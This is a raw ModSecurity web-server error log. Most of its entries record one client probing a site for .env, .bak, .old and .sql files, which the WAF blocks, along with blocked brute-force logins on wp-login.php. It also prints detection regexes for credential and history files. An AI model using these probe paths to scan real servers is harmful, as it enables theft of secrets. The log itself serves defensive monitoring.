[Tue May 26 19:50:39.741428 2026] [security2:error] [pid 86490:tid 86683] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsN1ZMwN0DpLVWo6KPmgAAAMQ"]
[Tue May 26 19:50:39.741965 2026] [security2:error] [pid 86490:tid 86654] [client 65.109.156.37:62950] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/blog-2/blog-boxed-column/"] [unique_id "ahWsN1ZMwN0DpLVWo6KPlwAAAKc"]
[Tue May 26 19:50:40.308922 2026] [security2:error] [pid 86490:tid 86738] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/newrelic/.env"] [unique_id "ahWsOFZMwN0DpLVWo6KPtgAAAPs"]
[Tue May 26 19:50:40.469343 2026] [security2:error] [pid 86490:tid 86684] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/FIRST_CONFIG/.env"] [unique_id "ahWsOFZMwN0DpLVWo6KPuAAAAMU"]
[Tue May 26 19:50:40.629454 2026] [security2:error] [pid 86490:tid 86677] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/project/.env"] [unique_id "ahWsOFZMwN0DpLVWo6KPvwAAAL4"]
[Tue May 26 19:50:40.951924 2026] [security2:error] [pid 86490:tid 86734] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/supabase/.env"] [unique_id "ahWsOFZMwN0DpLVWo6KPzgAAAPc"]
[Tue May 26 19:50:41.113668 2026] [security2:error] [pid 86490:tid 86715] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsOVZMwN0DpLVWo6KP1gAAAOQ"]
[Tue May 26 19:50:41.113698 2026] [security2:error] [pid 86490:tid 86715] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsOVZMwN0DpLVWo6KP1gAAAOQ"]
[Tue May 26 19:50:41.128034 2026] [security2:error] [pid 86490:tid 86672] [client 65.109.156.37:63703] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWsOVZMwN0DpLVWo6KP0gAAALk"]
[Tue May 26 19:50:41.436984 2026] [security2:error] [pid 86490:tid 86686] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mssql.php.old"] [unique_id "ahWsOVZMwN0DpLVWo6KP4QAAAMc"]
[Tue May 26 19:50:41.532651 2026] [security2:error] [pid 86490:tid 86636] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsOVZMwN0DpLVWo6KP5AAAAJU"]
[Tue May 26 19:50:41.532676 2026] [security2:error] [pid 86490:tid 86636] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsOVZMwN0DpLVWo6KP5AAAAJU"]
[Tue May 26 19:50:41.533199 2026] [security2:error] [pid 86490:tid 86690] [client 65.109.156.37:63885] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWsOVZMwN0DpLVWo6KP4gAAAMs"]
[Tue May 26 19:50:41.583566 2026] [security2:error] [pid 86490:tid 86683] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsOVZMwN0DpLVWo6KP3AAAAMQ"]
[Tue May 26 19:50:42.731039 2026] [security2:error] [pid 86490:tid 86692] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/.env.bak"] [unique_id "ahWsOlZMwN0DpLVWo6KQGQAAAM0"]
[Tue May 26 19:50:43.052389 2026] [security2:error] [pid 86490:tid 86731] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/datavase/.env"] [unique_id "ahWsO1ZMwN0DpLVWo6KQIQAAAPQ"]
[Tue May 26 19:50:43.699678 2026] [security2:error] [pid 86490:tid 86746] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/catalog/.env"] [unique_id "ahWsO1ZMwN0DpLVWo6KQOwAAAQM"]
[Tue May 26 19:50:44.054143 2026] [security2:error] [pid 86490:tid 86684] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsO1ZMwN0DpLVWo6KQNwAAAMU"]
[Tue May 26 19:50:44.512352 2026] [security2:error] [pid 86490:tid 86641] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/application.properties.old"] [unique_id "ahWsPFZMwN0DpLVWo6KQUwAAAJo"]
[Tue May 26 19:50:45.647300 2026] [security2:error] [pid 86490:tid 86721] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/env/test.bak"] [unique_id "ahWsPVZMwN0DpLVWo6KQdQAAAOo"]
[Tue May 26 19:50:46.575358 2026] [security2:error] [pid 86490:tid 86727] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsPlZMwN0DpLVWo6KQhwAAAPA"]
[Tue May 26 19:50:46.802231 2026] [security2:error] [pid 86490:tid 86685] [client 114.119.130.12:22911] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/blog/kurumsal-web-tasarim-hizmeti-nedir"] [unique_id "ahWsPlZMwN0DpLVWo6KQpQAAAMY"], referer: https://www.cagmedya.com/blog/kurumsal-web-tasarim-hizmeti-nedir
[Tue May 26 19:50:47.036429 2026] [security2:error] [pid 86490:tid 86538] [remote 50.6.192.190:41900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWsPlZMwN0DpLVWo6KQqAAAky8"]
[Tue May 26 19:50:47.103596 2026] [security2:error] [pid 86490:tid 86711] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/adminer/.env"] [unique_id "ahWsP1ZMwN0DpLVWo6KQqwAAAOA"]
[Tue May 26 19:50:47.751427 2026] [security2:error] [pid 86490:tid 86566] [remote 160.250.186.220:42028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsP1ZMwN0DpLVWo6KQwgABBEs"]
[Tue May 26 19:50:47.879306 2026] [fcgid:warn] [pid 86490:tid 86656] (70014)End of file found: [client 66.132.195.85:19404] mod_fcgid: can't get data from http client
[Tue May 26 19:50:48.233317 2026] [security2:error] [pid 86490:tid 86642] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sources/api/.env"] [unique_id "ahWsQFZMwN0DpLVWo6KQ2gAAAJs"]
[Tue May 26 19:50:48.556529 2026] [security2:error] [pid 86490:tid 86634] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/debug.sql"] [unique_id "ahWsQFZMwN0DpLVWo6KQ5wAAAJM"]
[Tue May 26 19:50:48.716851 2026] [security2:error] [pid 86490:tid 86645] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/front-app/.env"] [unique_id "ahWsQFZMwN0DpLVWo6KQ7wAAAJ4"]
[Tue May 26 19:50:48.847104 2026] [security2:error] [pid 86490:tid 86563] [remote 50.6.192.190:41900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWsQFZMwN0DpLVWo6KQ8AABA0g"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:50:48.878850 2026] [security2:error] [pid 86490:tid 86640] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lemonldap-ng-doc/.env"] [unique_id "ahWsQFZMwN0DpLVWo6KQ-QAAAJk"]
[Tue May 26 19:50:49.257471 2026] [security2:error] [pid 86490:tid 86679] [client 196.244.71.222:60549] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWsQFZMwN0DpLVWo6KQ6AAAAMA"], referer: https://www.cagmedya.com/
[Tue May 26 19:50:49.304740 2026] [security2:error] [pid 86490:tid 86625] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsQFZMwN0DpLVWo6KQ-gAAAIo"]
[Tue May 26 19:50:49.691502 2026] [security2:error] [pid 86490:tid 86659] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mqtt/.env"] [unique_id "ahWsQVZMwN0DpLVWo6KRGgAAAKw"]
[Tue May 26 19:50:49.852251 2026] [security2:error] [pid 86490:tid 86712] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/nginx/.env"] [unique_id "ahWsQVZMwN0DpLVWo6KRIgAAAOE"]
[Tue May 26 19:50:50.011860 2026] [security2:error] [pid 86490:tid 86639] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.vscode/.env"] [unique_id "ahWsQlZMwN0DpLVWo6KRLQAAAJg"]
[Tue May 26 19:50:50.495253 2026] [security2:error] [pid 86490:tid 86679] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nextjs-app/.env"] [unique_id "ahWsQlZMwN0DpLVWo6KRQgAAAMA"]
[Tue May 26 19:50:50.655555 2026] [security2:error] [pid 86490:tid 86682] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/october/.env"] [unique_id "ahWsQlZMwN0DpLVWo6KRRgAAAMM"]
[Tue May 26 19:50:50.816346 2026] [security2:error] [pid 86490:tid 86656] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public/uploads/.env"] [unique_id "ahWsQlZMwN0DpLVWo6KRSQAAAKk"]
[Tue May 26 19:50:51.333790 2026] [security2:error] [pid 86490:tid 86737] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsQlZMwN0DpLVWo6KRTQAAAPo"]
[Tue May 26 19:50:51.613697 2026] [security2:error] [pid 86490:tid 86643] [client 167.160.75.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsQ1ZMwN0DpLVWo6KRbwAAAJw"], referer: https://www.anujtradingco.com/
[Tue May 26 19:50:51.783494 2026] [security2:error] [pid 86490:tid 86701] [client 202.76.139.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsQ1ZMwN0DpLVWo6KRYgAAANY"]
[Tue May 26 19:50:51.950337 2026] [security2:error] [pid 86490:tid 86645] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web/config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web/config.env"] [unique_id "ahWsQ1ZMwN0DpLVWo6KRfgAAAJ4"]
[Tue May 26 19:50:52.111035 2026] [security2:error] [pid 86490:tid 86711] [client 185.177.72.53:12826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/phalcon/.env"] [unique_id "ahWsRFZMwN0DpLVWo6KRgwAAAOA"]
[Tue May 26 19:50:52.869771 2026] [security2:error] [pid 86490:tid 86739] [client 167.160.75.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsRFZMwN0DpLVWo6KRngAAAPw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1459652&moderation-hash=6ccdb250bf476491e51646257e4d321c
[Tue May 26 19:50:53.099350 2026] [security2:error] [pid 86490:tid 86621] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/production/.env.bak"] [unique_id "ahWsRVZMwN0DpLVWo6KRowAAAIY"]
[Tue May 26 19:50:53.266346 2026] [security2:error] [pid 86490:tid 86655] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel-app/api/.env"] [unique_id "ahWsRVZMwN0DpLVWo6KRrAAAAKg"]
[Tue May 26 19:50:53.433425 2026] [security2:error] [pid 86490:tid 86673] [client 185.177.72.53:58316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/app/env/.env"] [unique_id "ahWsRVZMwN0DpLVWo6KRsAAAALo"]
